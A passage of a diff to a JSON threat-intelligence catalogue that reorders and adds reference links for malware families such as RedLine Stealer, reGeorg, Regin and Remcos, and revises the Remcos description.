- "https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer",
- "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
- "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
- "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/",
- "https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
- "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/",
- "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://blog.netlab.360.com/purecrypter",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html",
- "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/",
- "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
- "https://cyber-anubis.github.io/malware%20analysis/redline/",
- "https://unit42.paloaltonetworks.com/bluesky-ransomware/",
- "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/",
- "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
- "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/",
- "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904",
- "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html",
- "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack",
"https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html",
- "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer",
- "https://asec.ahnlab.com/en/30445/",
- "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/",
- "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
- "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software",
- "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
- "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
- "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf",
- "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/",
- "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/",
- "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/",
- "https://unit42.paloaltonetworks.com/lapsus-group/",
- "https://asec.ahnlab.com/en/35981/",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://asec.ahnlab.com/ko/25837/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer",
- "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
"https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
- "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/"
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://unit42.paloaltonetworks.com/bluesky-ransomware/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html",
+ "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
+ "https://securityscorecard.pathfactory.com/all/a-detailed-analysis",
+ "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer",
+ "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer",
+ "https://unit42.paloaltonetworks.com/lapsus-group/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://cyber-anubis.github.io/malware%20analysis/redline/",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
+ "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://asec.ahnlab.com/en/35981/",
+ "https://securityscorecard.com/research/detailed-analysis-redline-stealer",
+ "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/",
+ "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/",
+ "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two",
+ "https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software",
+ "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://blog.avast.com/adobe-acrobat-sign-malware",
+ "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf",
+ "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
+ "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904",
+ "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/",
+ "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer",
+ "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/",
+ "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf",
+ "https://securelist.com/malvertising-through-search-engines/108996/",
+ "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html",
+ "https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/",
+ "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload",
+ "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html",
+ "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://muha2xmad.github.io/malware-analysis/fullredline/",
+ "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign",
+ "https://asec.ahnlab.com/en/30445/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/",
+ "https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html",
+ "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
],
"synonyms": [],
"type": []
@@ -38737,9 +40804,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf",
+ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf",
"https://twitter.com/ItsReallyNick/status/1136502701301346305",
- "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf"
],
"synonyms": [
"Dipsind"
@@ -38754,8 +40821,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
],
"synonyms": [],
"type": []
@@ -38807,25 +40874,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns",
- "https://sensepost.com/discover/tools/reGeorg/",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
"https://github.com/sensepost/reGeorg",
- "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF"
+ "https://sensepost.com/discover/tools/reGeorg/",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2c62f08a-9bd9-11e8-9e20-db9ec0d2b277",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9ee0eb87-7648-4581-b301-7472a48946ad",
"value": "reGeorg"
},
@@ -38834,27 +40893,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regin",
- "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf",
- "https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/",
"https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://www.youtube.com/watch?v=jeLd-gw2bWo",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf",
"https://www.epicturla.com/previous-works/hitb2020-voltron-sta",
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf",
+ "https://www.youtube.com/watch?v=jeLd-gw2bWo",
"https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ "https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "0cf21558-1217-4d36-9536-2919cfd44825",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb",
"value": "Regin"
},
@@ -38863,9 +40913,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker",
+ "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/",
"https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/",
- "https://twitter.com/malwrhunterteam/status/1321375502179905536",
- "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/"
+ "https://twitter.com/malwrhunterteam/status/1321375502179905536"
],
"synonyms": [],
"type": []
@@ -38963,79 +41013,89 @@
"value": "RemCom"
},
{
- "description": "Remcos (acronym of Remote Control & Surveillance Software) is a Remote Access Software used to remotely control computers.\r\nRemcos, once installed, opens a backdoor on the computer, granting full access to the remote user. \r\nRemcos can be used for surveillance and penetration testing purposes, and in some instances has been used in hacking campaigns. ",
+ "description": "Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.\r\n\r\nRemcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.\r\nRemcos, once installed, opens a backdoor on the computer, granting full access to the remote user.\r\nRemcos is developed by the cybersecurity company BreakingSecurity.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos",
- "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
- "https://www.connectwise.com/resources/formbook-remcos-rat",
- "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://secrary.com/ReversingMalware/RemcosRAT/",
- "https://www.youtube.com/watch?v=DIH4SvKuktM",
- "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/",
- "https://perception-point.io/behind-the-attack-remcos-rat/",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/",
"https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
- "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
- "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
"https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
- "https://www.telsy.com/download/4832/",
- "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/",
- "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html",
- "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html",
- "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/",
- "https://asec.ahnlab.com/en/32376/",
- "https://muha2xmad.github.io/unpacking/remcos/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
"https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
- "https://www.esentire.com/blog/remcos-rat",
- "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
- "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://intel471.com/blog/privateloader-malware",
- "https://asec.ahnlab.com/ko/32101/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
- "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
- "http://malware-traffic-analysis.net/2017/12/22/index.html",
- "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain",
- "https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87",
- "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly",
- "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blog.morphisec.com/nft-malware-new-evasion-abilities",
+ "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://muha2xmad.github.io/unpacking/remcos/",
"https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://dissectingmalwa.re/malicious-ratatouille.html",
- "https://asec.ahnlab.com/ko/25837/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://www.esentire.com/blog/remcos-rat",
+ "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain",
+ "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/",
+ "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/",
+ "https://secrary.com/ReversingMalware/RemcosRAT/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
+ "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
"https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD",
- "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing",
- "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns",
- "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/",
+ "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/",
"https://muha2xmad.github.io/mal-document/remcosdoc/",
+ "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "http://malware-traffic-analysis.net/2017/12/22/index.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://asec.ahnlab.com/en/32376/",
+ "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
+ "https://www.telsy.com/download/4832/",
+ "https://www.connectwise.com/resources/formbook-remcos-rat",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://dissectingmalwa.re/malicious-ratatouille.html",
+ "https://asec.ahnlab.com/ko/32101/",
+ "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing",
+ "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html",
+ "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
+ "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md",
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://perception-point.io/behind-the-attack-remcos-rat/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
